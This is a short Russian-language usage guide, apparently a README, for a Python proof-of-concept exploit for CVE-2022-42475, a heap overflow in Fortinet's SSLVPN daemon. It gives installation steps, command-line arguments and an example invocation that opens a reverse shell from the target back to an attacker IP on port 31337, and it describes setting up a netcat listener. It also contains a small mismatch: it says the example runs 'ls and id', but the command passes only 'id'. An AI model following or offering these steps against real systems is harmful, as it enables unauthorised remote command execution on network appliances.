
Эксплойт на Python для CVE-2022-42475 (переполнение кучи) в демоне Fortinet SSLVPN. Обеспечивает обратную оболочку через pwntools с настраиваемыми целью, портом и командами.
POC-код для эксплуатации переполнения кучи в SSLVPN-демоне Fortinet
pip install pwntools Чтобы использовать этот код, сохраните его в файл, например exploit.py, и запустите с помощью Python в командной строке, передав необходимые аргументы. Вот пример команды для запуска эксплойта
python exploit.py <target_host> <target_port> <reverse_ip>
Замените <target_host> на имя хоста или IP-адрес целевой системы, <target_port> на номер порта уязвимого сервиса, а <reverse_ip> на IP-адрес машины, на которой вы хотите получить оболочку. Остальные аргументы — это команды, которые вы хотите выполнить, разделённые пробелами.
Например, если целевая система имеет IP-адрес 192.168.0.100, уязвимый сервис работает на порту 8080, и вы хотите выполнить команды ls и id, выполните следующую команду:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Это создаст обратное подключение оболочки к 192.168.0.101:31337 и выполнит команды ls и id на целевой системе. Обратите внимание, что вам потребуется запустить слушатель на указанном IP-адресе и порту для приёма обратной оболочки. Вы можете использовать такие инструменты, как ncat или netcat, для создания слушателя.